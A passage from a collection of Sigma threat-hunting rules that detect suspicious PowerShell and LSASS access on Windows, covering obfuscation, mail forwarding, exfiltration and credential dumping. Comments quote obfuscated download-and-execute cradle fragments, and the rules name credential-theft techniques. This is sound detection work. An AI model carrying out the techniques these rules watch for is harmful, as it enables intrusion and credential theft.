'HostApplication=?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n            - 'HostApplication=?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            - 'HostApplication=powershell'\n    filter_optional_citrix:\n        Data|contains: 'Citrix\\ConfigSync\\ConfigSync.ps1'\n    filter_optional_hexnode:\n        Data|contains: 'HostApplication=C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Programs using PowerShell directly without invocation of a dedicated interpreter\n    - MSP Detection Searcher\n    - Citrix ConfigSync.ps1\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_classic/posh_pc_bxor_operator_usage.yml",
    "content": "title: bXOR Operator Usage In PowerShell Command Line - PowerShell Classic\nid: 812837bb-b17f-45e9-8bd0-0ec35d2e3bd6\nstatus: test\ndescription: |\n    Detects PowerShell execution that makes use of the bxor (Bitwise XOR) operator.\n    Attackers might use it as an alternative obfuscation method to Base64 encoded commands.\n    Investigate the CommandLine and process tree to determine if the activity is malicious.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators?view=powershell-5.1\nauthor: Teymur Kheirkhabarov, Harish Segar\ndate: 2020-06-29\nmodified: 2024-12-11\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'HostName=ConsoleHost'\n            - ' -bxor '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml",
    "content": "title: Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet\nid: ea207a23-b441-4a17-9f76-ad5be47d51d3\nstatus: test\ndescription: Detects execution of \"Get-NetFirewallRule\" or \"Show-NetFirewallRule\" to enumerate the local firewall rules on a host.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps\n    - https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps\nauthor: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io\ndate: 2023-07-13\ntags:\n    - detection.threat-hunting\n    - attack.discovery\n    - attack.t1518.001\n    - attack.t1016\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_payload:\n        Payload|contains:\n            - 'Get-NetFirewallRule'\n            - 'Show-NetFirewallRule'\n    selection_contextinfo:\n        ContextInfo|contains:\n            - 'Get-NetFirewallRule'\n            - 'Show-NetFirewallRule'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administration scripts\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_compress_archive_usage.yml",
    "content": "title: Compress-Archive Cmdlet Execution\nid: 6dc5d284-69ea-42cf-9311-fb1c3932a69a\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" cmdlet in order to compress folders and files.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-12-15\ntags:\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1560\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Compress-Archive'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_email_forwarding_activity.yml",
    "content": "title: Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet\nid: 0c7686d5-c74e-4292-b224-2a08e956ebc4\nrelated:\n    - id: c726e007-2cd0-4a55-abfb-79730fbedee5\n      type: similar\n    - id: 15b7abbb-8b40-4d01-9ee2-b51994b1d474\n      type: obsolete\nstatus: experimental\ndescription: Detects email forwarding or redirecting activity via ExchangePowerShell Cmdlet\nreferences:\n    - https://redcanary.com/blog/email-forwarding-rules/\n    - https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems), Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-03-01\ntags:\n    - attack.collection\n    - attack.t1114.003\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.t1020\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n            - 'Set-Mailbox'\n    selection_params:\n        ScriptBlockText|contains:\n            - 'ForwardAsAttachmentTo'\n            - 'ForwardingAddress'\n            - 'ForwardingSmtpAddress'\n            - 'ForwardTo'\n            - 'RedirectTo' # Also covers \"RedirectToRecipients\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate mail forwarding rules created by users or administrators to forward email to designated internal or external recipients for business or operational purposes.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_inbox_rule_creation_or_update_activity.yml",
    "content": "title: Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet\nid: 04580eed-e1d6-426b-a570-f6e64a4577f7\nrelated:\n    - id: d3577be1-42c9-44a7-b56e-2e8de97349d3\n      type: similar\nstatus: experimental\ndescription: |\n    Detects inbox rule creation or update via ExchangePowerShell cmdlet, a technique commonly observed in Business Email Compromise (BEC) attacks to hide emails.\n    The usage of inbox rules can be a sign of a compromised mailbox, where an attacker is attempting to evade detections by suppressing or redirecting incoming emails.\n    Analysts should review these rules in context, validate whether they reflect normal user behavior, and correlate with other indicators such as unusual login activity or recent mailbox rule modifications.\nreferences:\n    - https://redcanary.com/threat-detection-report/techniques/email-hiding-rules/\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/new-inboxrule?view=exchange-ps\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/set-inboxrule?view=exchange-ps\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-02-10\ntags:\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1114.003\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n    selection_params:\n        ScriptBlockText|contains:\n            - 'DeleteMessage'\n            - 'MarkAsRead'\n            - 'MoveToFolder'\n            - 'SubjectOrBodyContainsWords'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate inbox rules created by users or administrators to manage email flow such as filtering, organizing, or automating email handling.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_mailbox_access.yml",
    "content": "title: Windows Mail App Mailbox Access Via PowerShell Script\nid: 4e485d01-e18a-43f6-a46b-ef20496fa9d3\nstatus: test\ndescription: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md\nauthor: frack113\ndate: 2023-07-08\ntags:\n    - attack.defense-evasion\n    - attack.t1070.008\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains: '\\Comms\\Unistore\\data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_new_netfirewallrule_allow.yml",
    "content": "title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock\nid: 8d31dd2e-b582-48ca-826e-dcaa2c1ca264\nrelated:\n    - id: 51483085-0cba-46a8-837e-4416496d6971\n      type: similar\nstatus: test\ndescription: |\n    Detects when a powershell script contains calls to the \"New-NetFirewallRule\" cmdlet in order to add a new firewall rule with an \"Allow\" action.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\n    - https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\n    - https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nauthor: frack113\ndate: 2024-05-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'New-NetFirewallRule*-Action*Allow'\n    condition: selection\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml",
    "content": "title: SMB over QUIC Via PowerShell Script\nid: 6df07c3b-8456-4f8b-87bb-fe31ec964cae\nrelated:\n    - id: 2238d337-42fb-4971-9a68-63570f2aede4\n      type: similar\nstatus: test\ndescription: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md\n    - https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps\n    - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/\nauthor: frack113\ndate: 2023-07-21\ntags:\n    - attack.lateral-movement\n    - attack.t1570\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-SmbMapping'\n            - '-TransportType QUIC'\n    condition: selection\nfalsepositives:\n    - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_registry_reconnaissance.yml",
    "content": "title: Potential Registry Reconnaissance Via PowerShell Script\nid: 064060aa-09fb-4636-817f-020a32aa7e9e\nrelated:\n    - id: 970007b7-ce32-49d0-a4a4-fbef016950bd\n      type: similar\nstatus: test\ndescription: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md\nauthor: frack113\ndate: 2023-07-02\ntags:\n    - attack.discovery\n    - attack.t1012\n    - attack.t1007\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # TODO: switch to |re|i: after sigma specification v2 is released\n        ScriptBlockText|re: '(Get-Item|gci|Get-ChildItem).{1,64}-Path.{1,64}\\\\(currentcontrolset\\\\services|CurrentVersion\\\\Policies\\\\Explorer\\\\Run|CurrentVersion\\\\Run|CurrentVersion\\\\ShellServiceObjectDelayLoad|CurrentVersion\\\\Windows\\winlogon)\\\\'\n    condition: selection\nfalsepositives:\n    - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_remove_item_path.yml",
    "content": "title: Use Of Remove-Item to Delete File - ScriptBlock\nid: b8af5f36-1361-4ebe-9e76-e36128d947bf\nstatus: test\ndescription: PowerShell Remove-Item  with -Path to delete a file or a folder with \"-Recurse\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\n    - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022-01-15\nmodified: 2022-03-17\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Remove-Item -Path '\n            - 'del -Path '\n            - 'erase -Path '\n            - 'rd -Path '\n            - 'ri -Path '\n            - 'rm -Path '\n            - 'rmdir -Path '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml",
    "content": "title: Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet\nid: 9a7afa56-4762-43eb-807d-c3dc9ffe211b\nstatus: test\ndescription: |\n    Detects the execution of a PowerShell script with a call to the \"Send-MailMessage\" cmdlet along with the \"-Attachments\" flag. This could be a potential sign of data exfiltration via Email.\n    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4\n    - https://www.ietf.org/rfc/rfc2821.txt\nauthor: frack113\ndate: 2022-09-26\nmodified: 2024-11-01\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Send-MailMessage*-Attachments'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml",
    "content": "title: Powershell Token Obfuscation - Powershell\nid: f3a98ce4-6164-4dd4-867c-4d83de7eca51\nrelated:\n    - id: deb9b646-a508-44ee-b7c9-d8965921c6b6\n      type: similar\nstatus: test\ndescription: |\n    Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation in Powershell scripts.\n    Use this rule as a threat-hunting baseline to find obfuscated scripts in your environment.\n    Once tested and tuned, consider deploying a production detection rule based on this hunting rule.\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation\nauthor: frack113\ndate: 2022-12-27\nmodified: 2025-10-19\ntags:\n    - attack.defense-evasion\n    - attack.t1027.009\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # Examples:\n        #   IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString\n        #   &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString\n        #   &(\"{2}{3}{0}{4}{1}\"-f 'e','Expression','I','nvok','-') (&(\"{0}{1}{2}\"-f'N','ew-O','bject') Net.WebClient).DownloadString\n        - ScriptBlockText|re: '\\w+`(\\w+|-|.)`[\\w+|\\s]'\n        # - ScriptBlockText|re: '\\((\\'(\\w|-|\\.)+\\'\\+)+\\'(\\w|-|\\.)+\\'\\)' TODO: fixme\n        - ScriptBlockText|re: '\"(\\{\\d\\}){2,}\"\\s*-f'  # trigger on at least two placeholders. One might be used for legitimate string formatting\n        #   ${e`Nv:pATh}\n        - ScriptBlockText|re: '(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}'\n    filter_envpath:\n        ScriptBlockText|contains: '${env:path}' # TODO: Fix this. See https://github.com/SigmaHQ/sigma/pull/4964\n    filter_chocolatey:\n        ScriptBlockText|contains:\n            - 'it will return true or false instead'  # Chocolatey install script https://github.com/chocolatey/chocolatey\n            - 'The function also prevents `Get-ItemProperty` from failing' # https://docs.chocolatey.org/en-us/create/functions/get-uninstallregistrykey\n    filter_exchange:\n        Path|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n        Path|endswith: '\\bin\\servicecontrol.ps1'\n        ScriptBlockText|contains: '`r`n'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Edge case might be possible with heavy use of string formatting or obfuscation in legitimate scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_win_api_functions_access.yml",
    "content": "title: WinAPI Library Calls Via PowerShell Scripts\nid: 19d65a1c-8540-4140-8062-8eb00db0bba5\nrelated:\n    - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\n      type: similar\n    - id: 03d83090-8cba-44a0-b02f-0b756a050306\n      type: similar\n    - id: 9f22ccd5-a435-453b-af96-bf99cbb594d4\n      type: similar\nstatus: test\ndescription: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1106\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Advapi32.dll'\n            - 'kernel32.dll'\n            - 'KernelBase.dll'\n            - 'ntdll.dll'\n            - 'secur32.dll'\n            - 'user32.dll'\n    condition: selection\nfalsepositives:\n    - Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)\n    - Chocolatey scripts\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_win_api_library_access.yml",
    "content": "title: WinAPI Function Calls Via PowerShell Scripts\nid: 9f22ccd5-a435-453b-af96-bf99cbb594d4\nrelated:\n    - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\n      type: similar\n    - id: 03d83090-8cba-44a0-b02f-0b756a050306\n      type: similar\n    - id: 19d65a1c-8540-4140-8062-8eb00db0bba5\n      type: similar\nstatus: test\ndescription: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1106\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'AddSecurityPackage'\n            - 'AdjustTokenPrivileges'\n            - 'CloseHandle'\n            - 'CreateProcessWithToken'\n            - 'CreateRemoteThread'\n            - 'CreateThread'\n            - 'CreateUserThread'\n            - 'DangerousGetHandle'\n            - 'DuplicateTokenEx'\n            - 'EnumerateSecurityPackages'\n            - 'FreeLibrary'\n            - 'GetDelegateForFunctionPointer'\n            - 'GetLogonSessionData'\n            - 'GetModuleHandle'\n            - 'GetProcAddress'\n            - 'GetProcessHandle'\n            - 'GetTokenInformation'\n            - 'ImpersonateLoggedOnUser'\n            - 'LoadLibrary'\n            - 'memcpy'\n            - 'MiniDumpWriteDump'\n            - 'OpenDesktop'\n            - 'OpenProcess'\n            - 'OpenProcessToken'\n            - 'OpenThreadToken'\n            - 'OpenWindowStation'\n            - 'QueueUserApc'\n            - 'ReadProcessMemory'\n            - 'RevertToSelf'\n            - 'RtlCreateUserThread'\n            - 'SetThreadToken'\n            - 'VirtualAlloc'\n            - 'VirtualFree'\n            - 'VirtualProtect'\n            - 'WaitForSingleObject'\n            - 'WriteInt32'\n            - 'WriteProcessMemory'\n            - 'ZeroFreeGlobalAllocUnicode'\n    condition: selection\nfalsepositives:\n    - This rule is mainly used for hunting and will generate quite a lot of false positives when applied in production. It's best combined with other fields such as the path of execution, the parent process, etc.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_lsass_powershell_access.yml",
    "content": "title: Potential Credential Dumping Attempt Via PowerShell\nid: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5\nrelated:\n    - id: 3f07b9d1-2082-4c56-9277-613a621983cc\n      type: obsolete\n    - id: fb656378-f909-47c1-8747-278bf09f4f4f\n      type: similar\nstatus: test\ndescription: Detects a PowerShell process requesting access to \"lsass.exe\", which can be indicative of potential credential dumping attempts\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2023-11-28\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_lsass_susp_source_process.yml",
    "content": "title: LSASS Access From Program In Potentially Suspicious Folder\nid: fa34b441-961a-42fa-a100-ecc28c886725\nstatus: test\ndescription: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder\nreferences:\n    - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-27\nmodified: 2023-12-06\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\n    - detection.threat-hunting\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|endswith:\n            - '10'\n            - '30'\n            - '50'\n            - '70'\n            - '90'\n            - 'B0'\n            - 'D0'\n            - 'F0'\n            - '18'\n            - '38'\n            - '58'\n            - '78'\n            - '98'\n            - 'B8'\n            - 'D8'\n            - 'F8'\n            - '1A'\n            - '3A'\n            - '5A'\n            - '7A'\n            - '9A'\n            - 'BA'\n            - 'DA'\n            - 'FA'\n            - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n            - 'FF'\n        SourceImage|contains:\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\PerfLogs\\'\n            - '\\AppData\\'\n            - '\\Temporary'\n    filter_optional_generic_appdata:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\'\n        SourceImage|endswith:\n            - '\\Microsoft VS Code\\Code.exe'\n            - '\\software_reporter_tool.exe'\n            - '\\DropboxUpdate.exe'\n            - '\\MBAMInstallerService.exe'\n            - '\\WebexMTA.exe'\n            - '\\Meetings\\WebexMTAV2.exe'\n            - '\\WebEx\\WebexHost.exe'\n            - '\\JetBrains\\Toolbox\\bin\\jetbrains-toolbox.exe'\n        GrantedAccess: '0x410'\n    filter_optional_dropbox_1:\n        SourceImage|contains: ':\\Windows\\Temp\\'\n        SourceImage|endswith: '.tmp\\DropboxUpdate.exe'\n        GrantedAccess:\n            - '0x410'\n            - '0x1410'\n    filter_optional_dropbox_2:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n        SourceImage|endswith: '.tmp\\DropboxUpdate.exe'\n        GrantedAccess: '0x1410'\n    filter_optional_dropbox_3:\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\Dropbox\\'\n            - ':\\Program Files\\Dropbox\\'\n        SourceImage|endswith: '\\DropboxUpdate.exe'\n        GrantedAccess: '0x1410'\n    filter_optional_nextron:\n        SourceImage|contains:\n            - ':\\Windows\\Temp\\asgard2-agent\\'\n            - ':\\Windows\\Temp\\asgard2-agent-sc\\'\n        SourceImage|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n        GrantedAccess:\n            - '0x1fffff'\n            - '0x1010'\n            - '0x101010'\n    filter_optional_ms_products:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\vs_bootstrapper_'\n        GrantedAccess: '0x1410'\n    filter_optional_chrome_update:\n        SourceImage|contains: ':\\Program Files (x86)\\Google\\Temp\\'\n        SourceImage|endswith: '.tmp\\GoogleUpdate.exe'\n        GrantedAccess:\n            - '0x410'\n            - '0x1410'\n    filter_optional_keybase:\n        SourceImage|contains: ':\\Users\\'\n        SourceImage|endswith: \\AppData\\Local\\Keybase\\keybase.exe\n        GrantedAccess: '0x1fffff'\n    filter_optional_avira:\n        SourceImage|contains: '\\AppData\\Local\\Temp\\is-'\n        SourceImage|endswith: '.tmp\\avira_system_speedup.tmp'\n        GrantedAccess: '0x1410'\n    filter_optional_viberpc_updater:\n        SourceImage|contains: '\\AppData\\Roaming\\ViberPC\\'\n        SourceImage|endswith: '\\updater.exe'\n        TargetImage|endswith: '\\winlogon.exe'\n        GrantedAccess: '0x1fffff'\n    filter_optional_adobe_arm_helper:\n        SourceImage|contains:  # Example path: 'C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Temp\\2092867405\\AdobeARMHelper.exe'\n            - ':\\Program Files\\Common Files\\Adobe\\ARM\\'\n            - ':\\Program Files (x86)\\Common Files\\Adobe\\ARM\\'\n        SourceImage|endswith: '\\AdobeARMHelper.exe'\n        GrantedAccess: '0x1410'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Updaters and installers are typical false positives. Apply custom filters depending on your environment\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_lsass_uncommon_access_flag.yml",
    "content": "title: Uncommon GrantedAccess Flags On LSASS\nid: 678dfc63-fefb-47a5-a04c-26bcf8cc9f65\nrelated:\n    - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\n      type: obsolete\nstatus: test\ndescription: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410\nreferences:\n    - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-13\nmodified: 2023-11-30\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\n    - detection.threat-hunting\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|endswith: '10'\n    # Absolute paths to programs that cause false positives\n    filter1:\n        SourceImage:\n            - 'C:\\Program Files\\Common Files\\McAfee\\MMSSHost\\MMSSHOST.exe'\n            - 'C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n            - 'C:\\Program Files\\Windows Defender\\MsMpEng.exe'\n            - 'C:\\PROGRAMDATA\\MALWAREBYTES\\MBAMSERVICE\\ctlrupdate\\mbupdatr.exe'\n            - 'C:\\Windows\\System32\\lsass.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\WINDOWS\\System32\\perfmon.exe'\n            - 'C:\\WINDOWS\\system32\\taskhostw.exe'\n            - 'C:\\WINDOWS\\system32\\taskmgr.exe'\n            - 'C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe'\n    # Windows Defender\n    